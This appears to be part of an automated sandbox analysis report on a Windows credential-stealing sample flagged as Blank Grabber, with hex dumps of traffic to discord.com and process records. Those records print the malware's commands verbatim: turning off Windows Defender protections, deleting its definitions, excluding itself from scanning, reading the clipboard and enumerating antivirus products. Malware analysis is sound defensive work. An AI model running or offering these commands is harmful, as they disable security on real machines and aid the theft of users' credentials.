                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 4e 34 d6 48 a8 04 64 84 a4 d6 ee a6 0e ff 28 08 3a 22 80 0a 80 75 02 8f 1a ff eb 8a 3c 36 cd 92 72 65 30 3a 70 26 69 c0 81 f3 8d b4 16 86 5f cf de ec 13 bc 8f 62 30 f7 f5 5f 78 1b 09 09 20 11 94 18 1e 53 54 8d 3c 1a d4 7d 1c 99 9e 69 b5 4b db ff a8 d9 dc 1a 85 44 bd 8e 81 1b ac 62 0a e9 05 13 52 57 30 2f 9b e2 72 f1 7a 64 41 75 ed b7 2b c0 f7 07 e5 f4 5b 7f 35 6f 55 e7 47 91 32 56 ae 95 63 8a f6 62 0d 87 12 7c c3 cd 74 39 56 60 29 89 66 f4 d5 58 c4 96 99 22 2a d7 b7 0d 59 4c ac 91 f0 45 fa f7 31 f4 07 11 d0 46 2d e0 5e 07 ce fa 98 9c d6 ab da 55 b4 0c 4b 89 be 10 dc 67 7b 23 e6 e1 22 b7 a4 c8 c2 8b ef d4 39 8b a6 2f 28 da dd 1e 47 90 85 97 dd 0b 74 ef d8 4d 7f 86 e1 d3 ed c4 60 09 2c 8b 56 3c 61 b1 d1 a1 d9 f2 4f 33 92 5a 8b 0f 2d 03 e2 56 5e 64 8e d4 62
                                                                                                                                                                                                                                          Data Ascii: N4Hd(:"u<6re0:p&i_b0_x ST<}iKDbRW0/rzdAu+[5oUG2Vcb|t9V`)fX"*YLE1F-^UKg{#"9/(GtM`,V<aO3Z-V^db
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 43 af b1 f1 81 39 9a a3 73 05 0d 0f 01 30 ee 3d f8 7a 70 e7 65 fa f7 4c 60 d5 11 35 60 e8 b5 07 cc d9 35 fe 17 a0 09 a9 b0 59 3e 71 8e a9 bc 0d c5 b4 6b 27 8c 4b c4 ae aa bc 7f af ba a5 a4 9e d9 e7 1e 10 09 af 4c 29 c7 d3 89 6a 76 11 de d5 aa df bd bc 57 44 53 1e 1d 33 a2 e8 b3 71 ce 70 9c 5d f6 3d 8c a8 44 76 9f 29 9e b2 c6 54 b3 12 1a c6 0d a1 27 57 d7 57 5f 02 19 82 4b 23 d6 98 33 90 0f 5a d0 2d ad 2d 8a 02 b8 ea f3 65 fa 58 e9 dd 2e 6b 78 9d cf 46 2b 8f 9f c7 c9 23 c8 e0 19 94 27 9c 77 21 0e 25 84 9d a5 ec e4 20 f3 25 3f 61 4f b3 5d e9 2b d6 51 cc e6 d9 30 b6 2b 06 00 f0 7a b9 ca 36 25 a4 b2 b5 0a e8 e3 a6 5a b5 fc 60 e2 89 58 7c 96 29 19 29 8e 04 95 60 75 06 58 7e f8 57 40 9e 37 b2 9e dd 92 f2 a4 d6 b7 f6 3b 42 89 29 71 29 39 04 4f db 63 85 38 e7 2a
                                                                                                                                                                                                                                          Data Ascii: C9s0=zpeL`5`5Y>qk'KL)jvWDS3qp]=Dv)T'WW_K#3Z--eX.kxF+#'w!% %?aO]+Q0+z6%Z`X|))`uX~W@7;B)q)9Oc8*
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: ac 3e e8 89 e0 95 c5 a2 b7 9a 86 bf 2a 30 27 ab e4 a3 2a e0 53 46 fb 00 c5 03 2f ea c4 97 6b 78 44 24 55 5a e6 20 55 60 f7 bd f7 99 c9 03 03 82 2e a5 d5 34 c5 7f 17 d3 c0 ec 26 fb 77 f9 fc 62 67 57 0e 1a 3e 82 d8 e4 3d 4e b4 82 8d af 92 30 b3 3c 2e ea 8e c3 2d 1d cf d5 60 c1 5b f2 b0 81 f7 a6 4a 6a ac 4a 76 95 1c b2 9f 8d 84 38 b9 b9 11 fc 5b ee ca df 25 e3 4d c1 c4 ed cb 39 a7 57 8e 56 c5 5b f8 de 41 c0 ae 30 c0 43 96 80 b8 49 9f d1 81 4c e3 80 50 c9 5f cb c4 e5 73 ae 6b 6c d8 9c 71 97 41 2d dc 87 e8 53 1d 35 e6 d7 ea fa 94 65 ca 12 dd da 04 db c5 07 1e 95 30 59 0d 75 34 ff f0 11 78 40 2a 6d 50 ee fd fd ef d9 88 1f f2 78 ea 30 3b f4 c8 05 43 db 1e 23 80 1a 32 70 ec 17 50 dd ff ff 83 0a 13 0d 4c 25 c1 e1 5c 03 d6 b5 74 24 ec b5 67 28 f4 f2 8f 7c 7b 4e e5
                                                                                                                                                                                                                                          Data Ascii: >*0'*SF/kxD$UZ U`.4&wbgW>=N0<.-`[JjJv8[%M9WV[A0CILP_sklqA-S5e0Yu4x@*mPx0;C#2pPL%\t$g(|{N
                                                                                                                                                                                                                                          2024-11-15 09:44:35 UTC16384OUTData Raw: 47 55 45 ce 28 2b de 91 8e 20 e8 c4 bd ea 6a 03 c4 1e 1d 9f 4c 4f 81 8d 3b 0c e7 49 1c 61 0f cf 2f 3e 6e c1 69 b6 1f d6 85 42 fb 96 65 f5 83 d3 ae 16 95 63 89 91 66 fd dd af 03 4f 75 d8 22 03 f2 d3 a4 a0 50 8f 2a 01 4c 5e 7e 8c d9 e3 34 53 37 0d c1 d9 c4 81 0e 18 4a 71 e3 03 ec ed f9 b5 b7 77 e0 dd ea 58 54 ac 86 8e 67 9a 19 c5 c9 4a e9 83 d6 3e d0 75 81 4b 93 24 33 1c 01 5f 8f 77 37 7a 03 f2 2d d4 16 84 e0 10 11 a9 9e 58 b2 52 06 12 a2 a4 ad c7 50 8e b0 b4 17 ab 99 f1 2f 68 08 6f b0 c7 b4 45 63 e9 a1 8f 6b c8 1e 42 5c 45 67 83 e0 d8 04 85 a8 82 a7 77 36 80 b3 61 0f 5c 46 f1 2a c2 0e 26 db cf 95 e9 06 9a 80 e9 a7 68 1c 50 e3 ab 5e e3 cc e6 b6 d6 a4 ee 2f 6c 2c 9d 0d 23 01 c9 8d 53 1d 88 e7 69 4b 0f 16 99 4c eb 72 f6 8f a3 7a 25 12 e2 c0 ab 64 d2 75 32 11
                                                                                                                                                                                                                                          Data Ascii: GUE(+ jLO;Ia/>niBecfOu"P*L^~4S7JqwXTgJ>uK$3_w7z-XRP/hoEckB\Egw6a\F*&hP^/l,#SiKLrz%du2
                                                                                                                                                                                                                                          2024-11-15 09:44:36 UTC1259INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                          Date: Fri, 15 Nov 2024 09:44:36 GMT
                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                          x-ratelimit-reset: 1731663877
                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL1ESUKxhK9%2Babw4uCeDjxgqI4thUCNJCC78TML%2F85lNJMjNqLMWZ7Zs%2FqLOkjx%2BeMM11gsaMrJdKoNakvekrPA90Myi75LQhPIN6Y5BQQA7YVaXA%2FFvJrTzqQTB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Set-Cookie: __cfruid=f55cd052b753aefed4ac19e3284c0198d78f1511-1731663876; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                          Set-Cookie: _cfuvid=g7xrMuiCuj5YxJWgwxHxx7_wo5yDsKgDIiJmgNGLoGA-1731663876289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8e2e4db66acf6bce-DFW


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:04:44:01
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\HeilHitler.exe"
                                                                                                                                                                                                                                          Imagebase:0x7ff633d60000
                                                                                                                                                                                                                                          File size:6'251'402 bytes
                                                                                                                                                                                                                                          MD5 hash:AEAB677EDFB0B7838AD440C071A04965
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:04:44:01
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\HeilHitler.exe"
                                                                                                                                                                                                                                          Imagebase:0x7ff633d60000
                                                                                                                                                                                                                                          File size:6'251'402 bytes
                                                                                                                                                                                                                                          MD5 hash:AEAB677EDFB0B7838AD440C071A04965
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:04:44:04
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:04:44:04
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                          Imagebase:0x7ff73a600000
                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                          Imagebase:0x7ff73a600000
                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                          Imagebase:0x7ff73a600000
                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
